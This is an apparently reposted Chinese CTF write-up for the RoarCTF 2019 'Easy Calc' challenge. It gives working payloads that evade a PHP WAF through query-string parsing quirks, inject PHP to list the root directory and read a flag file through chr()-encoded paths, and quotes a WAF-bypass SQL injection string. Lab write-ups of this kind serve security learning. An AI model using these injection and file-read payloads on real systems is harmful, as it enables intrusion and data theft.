IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> [RoarCTF 2019]Easy Calc笔记 -> 正文阅读

[PHP知识库][RoarCTF 2019]Easy Calc笔记

[RoarCTF 2019]Easy Calc

一.首先打开题目发现一个“计算器”,随便输入后发现没什么用在这里插入图片描述
然后查看源码:
在这里插入图片描述
发现有waf:

`
    $('#calc').submit(function(){
        $.ajax({
            url:"calc.php?num="+encodeURIComponent($("#content").val()),
            type:'GET',
            success:function(data){
                $("#result").html(`<div class="alert alert-success">
            <strong>答案:</strong>${data}
            </div>`);
            },
            error:function(){
                alert("这啥?算不来!");
            }
        })
        return false;
    })`

注意到这一句:url:“calc.php?num=”+encodeURIComponent($("#content").val()),就访问一下calc.php:
在这里插入图片描述
可以看出黑名单过滤了一些字符

补充知识点:
scandir()函数:返回指定目录中的文件和目录的数组
扫根目录下的所有文件,也就是是scandir("/")
var_dump():输出变量的相关信息
chr() — 返回指定的字符
file_get_contents() — 将整个文件读入一个字符串
这是别人对PHP字符串解析漏洞的理解,
我们知道PHP将查询字符串(在URL或正文中)转换为内部 G E T 或 的 关 联 数 组 _GET或的关联数组 G?ET_POST。例如:/?foo=bar变成Array([foo] => “bar”)。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news[id%00=42会转换为Array([news_id] => 42)。如果一个IDS/IPS或WAF中有一条规则是当news_id参数的值是一个非数字的值则拦截,那么我们就可以用以下语句绕过:
/news.php?%20news[id%00=42"+AND+1=0–
上述PHP语句的参数%20news[id%00的值将存储到$_GET[“news_id”]中。
HP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:
1.删除空白符
2.将某些字符转换为下划线(包括空格)

二.接下来就自己尝试写payload:
首先 通过 chr(‘’) scandir() 搜寻目录(列出 参数目录 中的文件和目录,要不然我们怎么知道flag在哪)

输入 num(num前有一个空格,如果num前无空格,则返回一下forbidden,这个应该就是waf了,利用PHP的字符串解析特性就能够进行绕过waf)
在这里插入图片描述
由于scandir("/")扫描根目录时,过滤了"/",就用ASCII绕过,即
http://node4.buuoj.cn:26415/calc.php?%20num=a;var_dump(scandir(chr(47)))
得到
在这里插入图片描述
可以发现有f1agg,这里需要注意的是数字1,而非字母l

打印该文件var_dump(file_get_contents(chr(102).chr(49).chr(97).chr(103).chr(103)))等价于

var_dump(file_get_contents(“flagg”)),但返回bool(false),原来是路径问题 添加 /,

var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))),

得到flag:astring(43) "flag{3c6f0607-f4c3-44a9-ad52-6c3f8b4edeba} "

除了此方法外,看到别人有另一种解法(参考:HTTP走私攻击
形成原因
用burpsuite抓包再构造:
在这里插入图片描述

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-02-24 15:04:36  更:2022-02-24 15:04:52 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/26 15:50:29-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计